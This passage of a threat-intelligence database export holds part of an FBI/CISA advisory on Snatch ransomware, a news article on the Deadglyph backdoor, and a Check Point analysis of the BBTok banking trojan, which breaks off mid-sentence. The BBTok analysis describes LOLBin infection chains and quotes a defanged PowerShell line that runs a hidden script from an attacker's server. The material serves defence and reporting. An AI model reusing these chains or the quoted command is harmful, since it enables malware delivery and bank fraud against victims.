infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure.\nTable 6: Snatch Threat Actors ATT&CK Techniques for Enterprise – Initial Access\nTechnique Title\nID\nUse\nValid Accounts\nT1078(link is external)\nSnatch threat actors use compromised user credentials from criminal forums/marketplaces to gain access and maintain persistence on a victim’s network.\nExternal Remote Services\nT1133(link is external)\nSnatch threat actors exploit weaknesses in RDP to perform brute forcing and gain administrator credentials for a victim’s network.\nSnatch threat actors use VPN services to connect to a victim’s network.\nTable 7: Snatch Threat Actors ATT&CK Techniques for Enterprise – Execution\nTechnique Title\nID\nUse\nCommand and Scripting Interpreter: Windows Command Shell\nT1059.003(link is external)\nSnatch threat actors may use batch files (.bat) during ransomware execution and data discovery.\nSystem Services: Service Execution\nT1569.002(link is external)\nSnatch threat actors may leverage various Windows tools to enumerate systems on the victim’s network. Snatch ransomware used sc.exe.\nTable 8: Snatch Threat Actors ATT&CK Techniques for Enterprise – Persistence\nTechnique Title\nID\nUse\nValid Accounts: Domain Accounts\nT1078.002(link is external)\nSnatch threat actors compromise domain accounts to maintain persistence on a victim’s network.\nTable 9: Snatch Threat Actors ATT&CK Techniques for Enterprise – Defense Evasion\nTechnique Title\nID\nUse\nMasquerading\nT1036(link is external)\nSnatch threat actors have the ransomware executable match the SHA-256 hash of a legitimate file to avoid rule-based detection.\nIndicator Removal: File Deletion\nT1070.004(link is external)\nSnatch threat actors delete batch files from a victim’s filesystem once execution is complete.\nModify Registry\nT1112(link is external)\nSnatch threat actors modify Windows Registry keys to aid in persistence and execution.\nImpair Defenses: Disable or Modify Tools\nT1562.001(link is external)\nSnatch threat actors have attempted to disable a system’s antivirus program to enable persistence and ransomware execution.\nImpair Defenses: Safe Mode Boot\nT1562.009(link is external)\nSnatch threat actors abuse Windows Safe Mode to circumvent detection by antivirus or endpoint protection and encrypt files when few services are running.\nTable 10: Snatch Threat Actors ATT&CK Techniques for Enterprise – Credential Access\nTechnique Title\nID\nUse\nBrute Force: Password Guessing\nT1110.001(link is external)\nSnatch threat actors use brute force to obtain administrator credentials for a victim’s network.\nTable 11: Snatch Threat Actors ATT&CK Techniques for Enterprise – Discovery\nTechnique Title\nID\nUse\nQuery Registry\nT1012(link is external)\nSnatch threat actors may interact with the Windows Registry to gather information about the system, configuration, and installed software.\nProcess Discovery\nT1057(link is external)\nSnatch threat actors search for information about running processes on a system.\nTable 12: Snatch Threat Actors ATT&CK Techniques for Enterprise – Lateral Movement\nTechnique Title\nID\nUse\nRemote Services: Remote Desktop Protocol\nT1021.001(link is external)\nSnatch threat actors may use Valid Accounts to log into a computer using the Remote Desktop Protocol.\nTable 13: Snatch Threat Actors ATT&CK Techniques for Enterprise – Collection\nTechnique Title\nID\nUse\nData from Local System\nT1005(link is external)\nSnatch threat actors search systems to find files and folders of interest prior to exfiltration.\nTable 14: Snatch Threat Actors ATT&CK Techniques for Enterprise – Command and Control\nTechnique Title\nID\nUse\nApplication Layer Protocols: Web Protocols\nT1071.001(link is external)\nSnatch threat actors establish connections over port 443 to blend C2 traffic in with other web traffic.\nTable 15: Snatch Threat Actors ATT&CK Techniques for Enterprise – Exfiltration\nTechnique Title\nID\nUse\nExfiltration\nTA0010(link is external)\nSnatch threat actors use exfiltration techniques to steal data from a victim’s network.\nTable 16: Snatch Threat Actors ATT&CK Techniques for Enterprise – Impact\nTechnique Title\nID\nUse\nData Encrypted for Impact\nT1486(link is external)\nSnatch threat actors encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources.\nInhibit System Recovery\nT1490(link is external)\nSnatch threat actors delete all volume shadow copies from a victim’s filesystem to inhibit system recovery.\nMITIGATIONS\nThese mitigations apply to all stakeholders. The authoring agencies recommend that software manufactures incorporate secure-by-design and -default principles and tactics into their software development practices for hardening software against ransomware attacks (e.g., to prevent threat actors from using Safe Mode to evade detection and file encryption), thus strengthening the secure posture for their customers.\nFor more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide.\nThe FBI and CISA recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture on the basis of the Snatch threat actor’s activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.\nReduce threat of malicious actors using remote access tools by:\nAuditing remote access tools on your network to identify currently used and/or authorized software.\nReviewing logs for execution of remote access software to detect abnormal use of programs running as a portable executable [CPG 2.T].\nUsing security software to detect instances of remote access software being loaded only in memory.\nRequiring authorized remote access solutions to be used only from within your network over approved remote access solutions, such as virtual private networks (VPNs) or virtual desktop interfaces (VDIs).\nBlocking both inbound and outbound connections on common remote access software ports and protocols at the network perimeter.\nImplement application controls to manage and control execution of software, including allowlisting remote access programs.\nApplication controls should prevent installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.\nStrictly limit the use of RDP and other remote desktop services. If RDP is necessary, rigorously apply best practices, for example [CPG 2.W]:\nAudit the network for systems using RDP.\nClose unused RDP ports.\nEnforce account lockouts after a specified number of attempts.\nApply phishing-resistant multifactor authentication (MFA).\nLog RDP login attempts.\nDisable command-line and scripting activities and permissions [CPG 2.N].\nReview domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts [CPG 4.C].\nAudit user accounts with administrative privileges and configure access controls according to the principle of least privilege (PoLP) [CPG 2.E].\nReduce the threat of credential compromise via the following:\nPlace domain admin accounts in the protected users’ group to prevent caching of password hashes locally.\nRefrain from storing plaintext credentials in scripts.\nImplement time-based access for accounts set at the admin level and higher [CPG 2.A, 2.E].\nIn addition, the authoring authorities of this CSA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the impact and risk of compromise by ransomware or data extortion actors:\nImplement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).\nMaintain offline backups of data and regularly maintain backup and restoration (daily or weekly at minimum). By instituting this practice, an organization limits the severity of disruption to its business practices [CPG 2.R].\nRequire all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with NIST's standards for developing and managing password policies.\nUse longer passwords consisting of at least eight characters and no more than 64 characters in length [CPG 2.B].\nStore passwords in hashed format using industry-recognized password managers.\nAdd password user “salts” to shared login credentials.\nAvoid reusing passwords [CPG 2.C].\nImplement multiple failed login attempt account lockouts [CPG 2.G].\nDisable password “hints.”\nRefrain from requiring password changes more frequently than once per year.\nNote: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.\nRequire administrator credentials to install software.\nRequire phishing-resistant multifactor authentication (MFA) for all services to the extent possible, particularly for webmail, virtual private networks (VPNs), and accounts that access critical systems [CPG 2.H].\nKeep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E].\nSegment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement [CPG 2.F].\nIdentify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic and activity, including lateral movement, on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host [CPG 3.A].\nInstall, regularly update, and enable real time detection for antivirus software on all hosts.\nDisable unused ports and protocols [CPG 2.V].\nConsider adding an email banner to emails received from outside your organization [CPG 2.M].\nDisable hyperlinks in received emails.\nEnsure all backup data is encrypted, immutable (i.e., ensure backup data cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 2.K, 2.L, 2.R].\nVALIDATE SECURITY CONTROLS\nIn addition to applying mitigations, FBI and CISA recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. FBI and CISA recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.\nTo get started:\nSelect an ATT&CK technique described in this advisory (see Tables 4-16).\nAlign your security technologies against the technique.\nTest your technologies against the technique.\nAnalyze your detection and prevention technologies’ performance.\nRepeat the process for all security technologies to obtain a set of comprehensive performance data.\nTune your security program, including people, processes, and technologies, based on the data generated by this process.\nFBI and CISA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.\nRESOURCES\nStopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts.\nResource to mitigate a ransomware attack: #StopRansomware Guide.\nNo-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment(link is external).\nREPORTING\nThe FBI is seeking any information that can be shared, to include boundary logs showing communication to and from IP addresses, a sample ransom note, communications with Snatch threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. The FBI and CISA strongly discourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI Internet Crime Complaint Center (IC3) at ic3.gov, a local FBI Field Office, or to CISA at report@cisa.gov(link sends email) or (888) 282-0870.\nREFERENCES\n[1] DataBreaches.net(link is external)\nDISCLAIMER\nThe information in this report is being provided “as is” for informational purposes only. FBI and CISA do not endorse any commercial entity, product, or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI or CISA.\nVERSION HISTORY\nSeptember 20, 2023: Initial version.\nThis product is provided subject to this Notification and this Privacy & Use policy.\nPlease share your thoughts\nWe recently updated our anonymous product survey; we’d welcome your feedback.\nRelated Advisories\nSEP 07, 2023\nCYBERSECURITY ADVISORY | AA23-250A\nMultiple Nation-State Threat Actors Exploit CVE-2022-47966 and CVE-2022-42475\nAUG 30, 2023\nCYBERSECURITY ADVISORY | AA23-242A\nIdentification and Disruption of QakBot Infrastructure\nAUG 03, 2023\nCYBERSECURITY ADVISORY | AA23-215A\n2022 Top Routinely Exploited Vulnerabilities\nAUG 01, 2023\nCYBERSECURITY ADVISORY | AA23-213A\nThreat Actors Exploiting Ivanti EPMM Vulnerabilities\nReturn to top\nTopics\nSpotlight\nResources & Tools\nNews & Events\nCareers\nAbout\nFacebook\nTwitter\nLinkedIn\nYouTube\nInstagram\nRSS\nCISA Central\n888-282-0870 Central@cisa.dhs.gov\nDHS Seal\nCISA.gov\nAn official website of the U.S. Department of Homeland Security\nAbout CISA\nAccessibility\nBudget and Performance\nDHS.gov\nFOIA Requests\nNo FEAR Act\nOffice of Inspector General\nPrivacy Policy\nSubscribe\nThe White House\nUSA.gov\nWebsite Feedback",
  "status": "COMPLETE",
  "report_type": "WEBSITE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-09-26T15:20:58.218Z"
  },
  "added_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "6512f96cc12f2c67e0da88aa"
  },
  "name": "Deadglyph Backdoor",
  "file_type": null,
  "website_url": "https://thehackernews.com/2023/09/deadglyph-new-advanced-backdoor-with.html",
  "website_title": "Deadglyph: New Advanced Backdoor with Distinctive Malware Tactics",
  "file_name": null,
  "file_size": null,
  "content": "#1 Trusted Cybersecurity News Platform\nFollowed by 4.50+ million\n  \n Get the Free Newsletter\nHome\nCyber Attacks\nVulnerabilities\nStore\nContact\n\n\nDeadglyph: New Advanced Backdoor with Distinctive Malware Tactics\nSep 23, 2023THN\nCybersecurity researchers have discovered a previously undocumented advanced backdoor dubbed Deadglyph employed by a threat actor known as Stealth Falcon as part of a cyber espionage campaign.\n\"Deadglyph's architecture is unusual as it consists of cooperating components – one a native x64 binary, the other a .NET assembly,\" ESET said in a new report shared with The Hacker News.\n\"This combination is unusual because malware typically uses only one programming language for its components. This difference might indicate separate development of those two components while also taking advantage of unique features of the distinct programming languages they utilize.\"\nIt's also suspected that the use of different programming languages is a deliberate tactic to hinder analysis, making it a lot more challenging to navigate and debug.\nUnlike other traditional backdoors of its kind, the commands are received from an actor-controlled server in the form of additional modules that allow it to create new processes, read files, and collect information from the compromised systems.\nStealth Falcon (aka FruityArmor) was first exposed by the Citizen Lab in 2016, linking it to a set of targeted spyware attacks in the Middle East aimed at journalists, activists, and dissidents in the U.A.E. using spear-phishing lures embedding booby-trapped links pointing to macro-laced documents to deliver a custom implant capable of executing arbitrary commands.\nA subsequent investigation undertaken by Reuters in 2019 revealed a clandestine operation called Project Raven that involved a group of former U.S. intelligence operatives who were recruited by a cybersecurity firm named DarkMatter to spy on targets critical of the Arab monarchy.\nStealth Falcon and Project Raven are believed to be the same group based on the overlaps in tactics and targeting.\nThe group has since been linked to the zero-day exploitation of Windows flaws such as CVE-2018-8611 and CVE-2019-0797, with Mandiant noting in April 2020 that the espionage actor \"used more zero-days than any other group\" from 2016 to 2019.\nAround the same time, ESET detailed the adversary's use of a backdoor named Win32/StealthFalcon that was found to use the Windows Background Intelligent Transfer Service (BITS) for command-and-control (C2) communications and to gain complete control of an endpoint.\nDeadglyph is the latest addition to Stealth Falcon's arsenal, according to the Slovak cybersecurity firm, which analyzed an intrusion at an unnamed governmental entity in the Middle East.\nThe exact method used to deliver the implant is currently unknown, but the initial component that activates its execution is a shellcode loader that extracts and loads shellcode from the Windows Registry, which subsequently launches Deadglyph's native x64 module, referred to as the Executor.\nThe Executor then proceeds with loading a .NET component known as the Orchestrator that, in turn, communicates with the command-and-control (C2) server to await further instructions. The malware also engages in a series of evasive maneuvers to fly under the radar, counting the ability to uninstall itself.\nThe commands received from the server are queued for execution and can fall into one of three categories: Orchestrator tasks, Executor tasks, and Upload tasks.\n\"Executor tasks offer the ability to manage the backdoor and execute additional modules,\" ESET said. \"Orchestrator tasks offer the ability to manage the configuration of the Network and Timer modules, and also to cancel pending tasks.\"\nUPCOMING WEBINAR\nFight AI with AI — Battling Cyber Threats with Next-Gen AI Tools\nReady to tackle new AI-driven cybersecurity challenges? Join our insightful webinar with Zscaler to address the growing threat of generative AI in cybersecurity.\nClaim Your Spot\nSome of the identified Executor tasks comprise process creation, file access, and system metadata collection. The Timer module is used to poll the C2 server periodically in combination with the Network module, which implements the C2 communications using HTTPS POST requests.\nUpload tasks, as the name implies, allow the backdoor to upload the output of commands and errors.\nESET said it also identified a control panel (CPL) file that was uploaded to VirusTotal from Qatar, which is said to have functioned as a starting point for a multi-stage chain that paves the way for a shellcode downloader that shares some code resemblances with Deadglyph.\nWhile the nature of the shellcode retrieved from the C2 server remains unclear, it has been theorized that the content could potentially serve as the installer for the Deadglyph malware.\nDeadglyph gets its name from artifacts found in the backdoor (hexadecimal IDs 0xDEADB001 and 0xDEADB101 for the Timer module and its configuration), coupled with the presence of a homoglyph attack impersonating Microsoft (\"Ϻicrоsоft Corpоratiоn\") in the Registry shellcode loader's VERSIONINFO resource.\n\"Deadglyph boasts a range of counter-detection mechanisms, including continuous monitoring of system processes and the implementation of randomized network patterns,\" the company said. \"Furthermore, the backdoor is capable of uninstalling itself to minimize the likelihood of its detection in certain cases.\"\n\nFound this article interesting? Follow us on Twitter  and LinkedIn to read more exclusive content we post.\n\nTweet\n\nShare\n\nShare\n\nShare\nCybersecurity Solution\nOF THE WEEK\nIt's Time to Switch from VPN to ZTNA\nby BlackBerry\nCybersecurity\nUsers require flexible access to resources from anywhere, on any device. But VPNs are at odds with security objectives and new remote access requirements. Find out why Zero Trust Network Access (ZTNA) is a better way to work remotely than VPN.\nCylanceEDGE Key Features:\nEnable secure work from anywhere\nProtect information from diverse threats\nAllow users to work on any healthy device\nAdopt a zero-trust architecture\nEnable digital business transformation and cloud migration\nSimplify administration and reduce expenses\nEnable digital business transformation and cloud migration\nReduce attack surface\nRequest a Demo\nGet ZTNA Now\nBreaking News\nCybersecurity Resources\nGet results of Mac Security Survey 2023\nAI Insights Every Cybersecurity Professional Needs\nThe Ultimate Guide to Vulnerability Scanning\nA Global Cooperative Approach to Cybersecurity\nJoin 110,000+ Professionals\nSign up for free and start receiving your daily dose of cybersecurity news, insights and tips.\nEmail\nConnect with us!\n\n905,000 Followers\n\n1,950,000 Followers\n\n490,000 Followers\n\n22,000 Subscribers\n\n148,000 Followers\n\n120,000 Subscribers\nCompany\nAbout THN\nAdvertise with us\nContact\nPages\nWebinars\nDeals Store\nPrivacy Policy\n RSS Feeds\n Contact Us\n© The Hacker News, 2023. All Rights Reserved.",
  "status": "COMPLETE",
  "report_type": "WEBSITE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-09-26T15:31:56.376Z"
  },
  "added_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "6515a39f8749acb9f47faf85"
  },
  "name": "BBtok",
  "file_type": "application/pdf",
  "website_url": "",
  "website_title": null,
  "file_name": "BBtok.pdf",
  "file_size": "113 KB",
  "content": "Check Point Research recently discovered an active campaign operating and deploying a new\nvariant of the BBTok banker in Latin America. In the research, we highlight newly discovered\ninfection chains that use a unique combination of Living off the Land Binaries (LOLBins). This\nresulting in low detection rates, even though BBTok banker operates at least since 2020. As we\nanalyzed the campaign, we came across some of the threat actors server-side resources used in\nthe attacks, targeting hundreds of users in Brazil and Mexico.\n\nThe server-side components are responsible for serving malicious payloads that are likely distributed\nthrough phishing links. Weve observed numerous iterations of the same server-side scripts and\nconfiguration files which demonstrate the evolution of the BBTok banker deployment methods over\ntime. This insight allowed us to catch a glimpse of infection vectors that the actors have not yet\nimplemented, as well as trace the origins of the source code employed for sustaining such\noperations.\n\nIn this report, we highlight some of the server-side functionalities of the payload server which are\nused to distribute the banker. Those allow to generate unique payloads to each of the victims,\ngenerated upon a click.\n\nKey Findings\n\n1. BBTok continues being active, targeting users in Brazil and Mexico, employing multi-layered\n\ngeo-fencing to ensure infected machines are from those countries only.\n\n2. Since the last public reporting on BBTok in 2020, the operators techniques, tactics and\n\nprocedures (TTPs) have evolved significantly, adding additional layers of obfuscation and\ndownloaders, resulting in low detection rates.\n\n3. The BBTok banker has a dedicated functionality that replicates the interfaces of more than\n40 Mexican and Brazilian banks, and tricks the victims into entering its 2FA code to their\nbank accounts or into entering their payment card number.\n\n4. The newly identified payloads are generated by a custom server-side application,\n\nresponsible for generating unique payloads for each victim based on operating system and\nlocation.\n\n5. Analysis of payload server-side code revealed the actors are actively maintaining diversified\ninfection chains for different versions of Windows. Those chains employ a wide variety of file\ntypes, including ISO, ZIP, LNK, DOCX, JS and XLL.\n\n6. The threat actors add open-source code, code from hacking forums, and new exploits when\n\nthose appear (e.g. Follina) to their arsenal.\n\nBackground\n\nThe BBTok banker, first revealed in 2020, was deployed in Latin America through fileless attacks.\nThe banker has a wide set of functionalities, including enumerating and killing processes, keyboard\nand mouse control and manipulating clipboard contents. Alongside those, BBTok contains classic\nbanking Trojan features, simulating fake login pages to a wide variety of banks operating in Mexico\nand Brazil.\n\n\fSince it was first publicly disclosed, the BBTok operators have adopted new TTPs, all while still\nprimarily utilizing phishing emails with attachments for the initial infection. Recently weve seen\nindications of the banker distributed through phishing links, and not as attachments to the email\nitself.\n\nUpon accessing the malicious link, an ISO or ZIP file is downloaded to the victims machines. Those\ncontain an LNK file that kicks off the infection chain, leading to the deployment of the banker while\nopening a decoy document. Although the process appears to be quite straightforward upon first\nglimpse, weve found evidence that theres a lot going on behind the scenes.\n\nWhile analyzing these newly identified links, weve uncovered internal server-side resources used to\ndistribute the malware. Looking at those, it became evident the actor has maintained a much wider\nvariety of infection chains, generated on demand with each click, tailored to match the victims\noperating system and location.\n\nBBTok Banking Hijacks\n\nBBTok enables its operators a wide set of capabilities, ranging from remote commands to classic\nbanking Trojan capabilities. BBTok can replicate the interfaces of multiple Latin American banks. Its\ncode references over 40 major banks in Mexico and Brazil, such as Citibank, Scotibank, Banco Ita\nand HSBC (see Appendix B for the full list of targeted banks). The banker searches for indications of\nits victims being clients of those banks by iterating over the open windows and names of browser\ntabs, searching for bank names.\n\nThe default target the banker apparently aims at is BBVA, with the default fake interface aiming to\nreplicate its looks. Posing as legitimate institutions, these fake interfaces coax unsuspecting users\ninto divulging personal and financial details. The focus of this functionality is tricking the victim into\nentering the security code/ token number that serves as 2FA for bank account and to conduct\naccount takeovers of victims bank account. In some cases, this capability also aims to trick the\nvictim into entering his payment card number.\n\nBBTok, which is written in Delphi, uses the Visual Component Library (VCL) to create forms that,\nquite literally, form these fake interfaces. This allows the attackers to dynamically and naturally\ngenerate interfaces that fit the victims computer screen and a specific form for the bank of the\nvictim, without raising suspicion. BBVA, which is the default bank the banker targets, has its interface\nstored in one such form named TFRMBG. In addition to Banking sites, the attackers have kept up\nwith the times and have also started searching for information regarding Bitcoin on the infected\nmachine, actively looking for strings such as bitcoin, Electrum, and binance.\n\nBBTok doesnt stop at visual trickery; it has other capabilities as well. Specifically, it can install a\nmalicious browser extension or inject a DLL named rpp.dll to further its hold on the infected\nsystem, and likely to improve its capabilities to trick the victims. Those were not available during the\ntime of analysis.\n\n\fWhats notable is the operators cautious approach: all banking activities are only executed upon\ndirect command from its C2 server, and are not automatically carried out on every infected system.\n\nPayload Server Analysis\n\nOverview of the Payload Server\n\nTo effectively manage their campaign, the BBTok operators created a unique flow kicked off by the\nvictim clicking a malicious link, likely sent in a phishing email. When a victim clicks the link, it results\nin the download of either a ZIP archive or an ISO image, depending on the victims operating\nsystem. Although the process is seamless for the victim, the server generates a unique payload\nbased on parameters found within the request.\n\nThis process is carried out on a XAMPP-based server, and contains three essential components:\n\n1. A PowerShell script that handles payload preparation and contains the main bulk of the logic\n\nfor creating lure archives.\n\n2. A PHP codebase and database designed to document and manage infections.\n3. Auxiliary utilities that enhance the functionality of these components.\n\nThis is the chain of events:\n\n1. A victim performs an HTTP request to either /baixar, /descargar or /descarga (these\n\npaths suggest that the lures are in either Spanish or Portuguese).\n\n2. Based on the .htaccess file, the server handles the request using descarga.php.\n3. The scripts utilize the file db.php to store information via an SQLite database about the\n\nrequest, including the victims fingerprint.\n\n4. Descarga.php calls ps_gen.ps1 to generate a custom archive, which is eventually\n\ndelivered to the victim.\n\nIncoming Requests Handling\n\nThe PHP codebase is composed of the following files:\n\n1. descarga / descargar.php  Manages new connections and serves lure documents to\n\nthe victims PC.\n\n2. db.php  Generates and manages the SQLite database that includes the victims details.\n3. generator.php  Utility class used to generate random links, strings, and other\n\nfunctionalities.\n\nDescarga and descargar translate to download in Spanish. This file contains the main logic of\nthe infection process. The script itself contains many comments, some of them in plain Spanish and\nPortuguese, which provide hints as to the attackers origin.\n\n\fThe script logic\n\nPowerShell Payload Generator\n\nThe script ps_gen.ps1 contains the main logic for generating archive payloads, either as ZIP or\nISO files. The latest version of the code has a lot of commented-out sections that were likely\nfunctional in the past, which suggests they contain additional infection chains and lures. We found\nmultiple versions of the file, some dating back to July 2022, demonstrating that this operation has\nbeen ongoing for quite a while.\n\nOur analysis of the latest version is below. For more details on earlier variations and changes to the\nscript over time, see the section Earlier Versions.\n\nThe generator script is called by descarga.php, using the function DownloadFile with the\narguments file_name, ver and cc. These correspond to the generated archive name, the victims\nOS version and the victims country code.\n\nThe code portions utilized in the observed iteration of the server generate the archive payloads\nbased on two parameters:\n\n1. The origin country of the victim  Brazil or Mexico.\n2. Operating System extracted from the User-Agent  Windows 10 or 7.\n\nAccording to the results, the following parameters of the malicious archive are selected:\n\n1. Type of the archive: ISO for Windows 10, ZIP for Windows 7, and others.\n2. The name of the DLL file that is used in the next stage changes according to the targeted\n\ncountry: Trammy is used for Brazil, and Gammy is used for Mexico.\n\n3. The archive contains an LNK. The LNK shortcut icon in Windows 10 is the one used by\n\nMicrosoft Edge, and the one for Windows 7 is used by Google Chrome.\n\n4. The final execution logic. For Windows 10 victims, the script executes MSBuild.exe with a file\n\nnamed dat.xml from the server 216[.]250[.]251[.]196, which also stores the\nmalicious DLLs for the next stage. For Windows 7, the payload just downloads the relevant\nremote DLL via CMD execution.\n\nAdd-PoshObfuscation\n\nAll payloads are obfuscated using the Add-PoshObfuscation function. A simple search for parts of\nthe code yields a single result from the benign site hackforums[.]net, specifically a response from a\nuser named Qismon in August 2021. This individual recommends some methods to bypass AMSI\nand security products, and also shares the PoshObfuscation code:\n\n\fInfection Chains and Final Payload\n\nThe process described above eventually leads to two variations of the infection chain: one for\nWindows 7 and one for Windows 10. The differences between the two versions can be explained as\nattempts to avoid newly implemented detection mechanisms such as AMSI.\n\n*ammy.dll Downloaders\n\nBoth infection chains utilize malicious DLLs named using a similar convention  Trammy, Gammy,\nBrammy, or Kammy. The latter are leaner and obfuscated versions of BBToks loader that use\ngeofencing to thwart detection before executing any malicious actions. The final payload is a new\nversion of the BBTok banker. As documented previously, BBTok comes packed with multiple\nadditional password-protected software. These allow the actors full access to the infected machine,\nand additional functionalities.\n\nWindows 7 Infection Chain\n\nThe infection chain for Windows 7 is not unique and consists of an LNK file stored in a ZIP file. Upon\nexecution, the LNK file runs the *ammy.dll payload using rundll32.exe, which in turn downloads,\nextracts, and runs the BBTok payload.\n\nWindows 10 Infection Chain\n\nThe infection chain for Windows 10 is stored in an ISO file containing 3 components: an LNK file, a\nlure file, and a renamed cmd.exe executable. Clicking the LNK file kicks off the infection chain, using\nthe renamed cmd.exe to run all the commands in the following manner:\n\n1. Copy the lure file to the folder %userprofile% and open it.\n\n2. Run MSBuild.exe to build an application using an XML stored on a remote server, fetched\n\nover SMB.\n\n3. MSBuild.exe creates a randomly named DLL, which in turn downloads *ammy.dll from the\nserver and runs it with a renamed rundll32.exe(mmd.exe), as seen in the XML contents:\n\n4. The *ammy.dll downloader downloads, extracts, and runs the BBTok payload.\n\nThe unique combination of renamed CMD, MSBuild, and file fetching over SMB results in a low\ndetection rate for the Windows 10 infection chains.\n\nEarlier Versions\n\n\fThroughout our analysis of the BBTok campaign, we came across multiple versions of the artifacts\nfrom the payload server. We saw changes in all parts of the operation: the PHP code, the\nPowerShell script, and other utilities.\n\nChanges in the PHP Code\n\nLooking at an earlier version of the descarga.php script, we saw a few key differences:\n\n1. Originally, only victims from Mexico were targeted.\n2. The IP of a different payload server, 176[.]31[.]159[.]196, was hard-coded in the\n\n3.\n\nscript.\nInstead of executing the PowerShell script directly, a script named gen.php was called. We\nwere unable to obtain this script, but believe it simply executed the PowerShell script.\n4. The victims IP address, user agent, and a flag (jaBaixou, or already downloaded in\n\nPortuguese) were inserted into a database, using the db.php file. The flag is later checked\nto not serve the same payload twice.\n\nAs this section is not used in the latest version, it is possible that the attackers found\nthis process cumbersome and decided to trade OPSEC for easier management and a\nhigher chance of infection success.\n\nModifications of the PowerShell Script\n\nLooking at older versions of the PowerShell script, it was clear that numerous changes were done to\nthe payload and execution chain. Some noteworthy ones include:\n\n1.\n\nIn the earliest versions of the script, the LNK simply ran a PowerShell script with the\narguments -ExecutionPolicy Unrestricted -W hidden -File\n\\\\%PARAM%[.]supplier[.]serveftp[.]net\\files\\asd.ps1.\n\n2. A later update added the lure PDF, fac.pdf (fac is an abbreviation of factura, which is\n\ninvoice in Portuguese). This is a legitimate receipt, in Spanish, from the county of Colima in\nMexico. Additionally, the payload for Windows 7 victims launched a legitimate Mexican\ngovernment site, hxxps://failover[.]www[.]gob[.]mx/mantenimiento.html.\n\n3. The newest version we found opens a different legitimate site,\n\nhxxps://fazenda[.]gov[.]br, a Brazilian government site. This version also changes\nthe XML file used by MSBuild and changes the name of the DLL reserved for Brazilian\ntargets from Brammy.dll to Trammy.dll.\n\nUnused Code and Infection Vectors\n\nCertain sections of the code within the PowerShell script were unused, and the server hosted files\nthat were not part of the primary infection flow we discussed. In particular, we did not discover any\nindication of active usage of the following:\n\n\f1. ze.docx is a document that exploits the Follina CVE (2022-30190). It is referenced in the\n\nPowerShell script in a function named CreateDoc.\n\n2. xll.xll, which is referenced by CreateXLL, is a malicious xll taken from the open-source\nproject https://github.com/moohax/xllpoc, which implements code execution via Excel.\n3. Numerous empty JavaScript files were found on the server, likely to be used by a function\nnamed CreateJS. The file referenced in the function, b.js, was empty, so it is unclear\nwhether this function was previously used or was never fully implemented.\n\n4. Multiple bat files were located on the server, each with a different implementation of\n\ndownloading next stages. These were most likely created by a function named CreateBat,\nwhich is commented out in the latest version of the PowerShell script. Most of them are\nalmost identical to the code in the ByFD function we analyzed previously, excluding two\nnoteworthy past iterations:\n\n1. The oldest bat file downloaded another PowerShell script as a next stage (which\n\nwasnt publicly available anymore) instead of editing the registry;\n\n2. A later bat file used the fodhelper UAC bypass instead of the computerdefaults one\n\nwhich is currently being used.\n\nVictimology and Attribution\n\nOur analysis of the server-side component also sheds light on one of the recent campaigns as seen\nfrom the threat actors side, based on a database we found that documents access to the malicious\napplication. The database is named links.sqlite and is pretty straightforward. It contains over\n150 entries, all unique, with the table headers corresponding to the ones created by db.php. Note\nthe use of the Portuguese language and the names of the 4 rows:\n\n1. chave, or key;\n2. assunto, or subject;\n3. user_agent ;\n4. baixou, or downloaded.\n\nThe column named chave contained the IP addresses of the victims, and the column assunto was\nempty:\n\nAs the server code was never meant to be seen by anyone except the threat actors, and it contained\nnumerous comments in Portuguese, we believe this indicates that with a high probability the 